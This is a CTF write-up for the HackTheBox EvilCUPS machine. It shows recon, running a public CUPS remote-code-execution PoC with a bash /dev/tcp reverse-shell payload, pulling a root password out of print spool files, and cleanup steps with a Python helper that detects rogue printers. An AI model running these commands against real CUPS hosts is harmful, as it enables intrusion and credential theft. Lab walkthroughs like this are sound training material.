HackTheBox EvilCUPS Writeup
This writeup walks through the EvilCUPS Capture The Flag (CTF) challenge, a medium-difficulty HackTheBox machine, step by step, keeping each concept clear and simple so that it stays accessible for players at this level.
Add Hosts
10.10.11.40 evilcups.htb
Script to add hosts automatically
ip="10.10.11.40"
domain="evilcups.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV evilcups.htb
Nmap scan report for evilcups.htb (10.10.11.40)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can access the CUPS interface at http://10.10.11.40:631.
Remote Code Execution (RCE)
This attack is described in detail here:
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
The proof of concept (PoC) was created by the room creator and can be found here:
https://github.com/IppSec/evil-cups
Start a Listener
Set up a listener to capture the reverse shell:
nc -lvnp 9001
Download and Set Up the Exploit
You’ll need the Python ippserver package for the CUPS exploit.
wget https://raw.githubusercontent.com/IppSec/evil-cups/refs/heads/main/evilcups.py -O evilcups
chmod +x evilcups
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
./evilcups $vpnip 10.10.11.40 'bash -c "nohup bash -i >& /dev/tcp/'$vpnip'/9001 0>&1"&'
Trigger the RCE
To trigger the reverse shell, go to the CUPS web interface at http://10.10.11.40:631. Find the added printer, click on “Maintenance,” and then click on “Print Test Page.”
Retrieve the User Flag
Once you have shell access, you can retrieve the user flag:
cat /home/htb/user.txt
Explore CUPS Spool Files
Navigate to the CUPS spool directory to inspect the files:
cd /var/spool/cups
cat d00001-001
Set up a Python HTTP server to transfer the file:
python3 -m http.server
Download and Convert the Spool File
On your local machine, download the spool file:
wget 'http://10.10.11.40:8000/d00001-001'
Convert the file to PDF format:
ps2pdf d00001-001 d00001-001.pdf
Open the PDF to inspect its contents:
xdg-open d00001-001.pdf
Retrieve the Root Password
With the root password recovered from the printed document in the spool file, SSH into the box as root:
ssh root@10.10.11.40
Retrieve the root flag:
cat /root/root.txt
Good OpSec: Removing a Malicious Printer from CUPS
List Active Printers
Check which printers are currently active:
lpstat -p
Example:
printer Canon_MB2300_series is idle.
printer HACKED_10_10_14_2 is idle.
Attempt Printer Removal
Try to remove the malicious printer:
lpadmin -x HACKED_10_10_14_2
Restart CUPS
Apply changes by restarting the CUPS service:
systemctl restart cups
Verify Removal
Check again to ensure the printer is removed:
lpstat -p
Manual Removal (If Necessary)
If lpadmin fails, manually edit the printer configuration:
nano /etc/cups/printers.conf
Delete the section for the unwanted printer:
<Printer HACKED_10_10_14_2>
...
</Printer>
Save and exit (Ctrl + O, Ctrl + X).
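A small helper for the manual-removal step, added here and not part of the original writeup or of CUPS itself: it parses printers.conf, lists queues whose DeviceURI scheme falls outside an expected allow-list (assumed here to be only local usb/socket devices), and strips a named <Printer> block. The configuration text is a constructed sample in the real file's layout, not captured from the box.

```python
import re

# Constructed sample of /etc/cups/printers.conf (not captured from the machine).
# The "<Printer NAME> ... </Printer>" block layout matches the real file.
SAMPLE_CONF = """\
# Printer configuration file for CUPS v2.4.2
<Printer Canon_MB2300_series>
Info Canon MB2300 series
DeviceURI usb://Canon/MB2300%20series
State Idle
Accepting Yes
</Printer>
<Printer HACKED_10_10_14_2>
Info HACKED
DeviceURI ipp://10.10.14.2/printers/HACKED
State Idle
Accepting Yes
</Printer>
"""

# One <Printer NAME> ... </Printer> block; DOTALL so the body may span lines.
BLOCK_RE = re.compile(r"<Printer (?P<name>[^>\s]+)>\n(?P<body>.*?)\n</Printer>\n?", re.S)


def parse_printers(conf):
    """Map printer name -> dict of 'Key value' lines found inside its block."""
    printers = {}
    for m in BLOCK_RE.finditer(conf):
        attrs = {}
        for line in m.group("body").splitlines():
            key, _, value = line.partition(" ")
            attrs[key] = value
        printers[m.group("name")] = attrs
    return printers


def suspicious_printers(conf, allowed_schemes=("usb", "socket")):
    """Names of queues whose DeviceURI scheme is not in the allow-list.
    The allow-list is an assumption: a host that only owns local printers
    should not suddenly grow a network (ipp://) queue."""
    flagged = []
    for name, attrs in parse_printers(conf).items():
        scheme = attrs.get("DeviceURI", "").split(":", 1)[0]
        if scheme not in allowed_schemes:
            flagged.append(name)
    return flagged


def remove_printer(conf, name):
    """Return conf with the named <Printer> block deleted; other blocks untouched."""
    pattern = re.compile(r"<Printer " + re.escape(name) + r">\n.*?\n</Printer>\n?", re.S)
    return pattern.sub("", conf, count=1)
```

cupsd rewrites printers.conf on its own, so stop the service before writing the cleaned text back and start it again afterwards.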
Clear CUPS Cache
Remove the CUPS job cache:
rm /var/cache/cups/job.cache
Important: Only clear spool files if you are sure there’s no sensitive data:
rm /var/spool/cups/d* /var/spool/cups/c*
Note: On this machine, avoid removing spool files because they contain the password.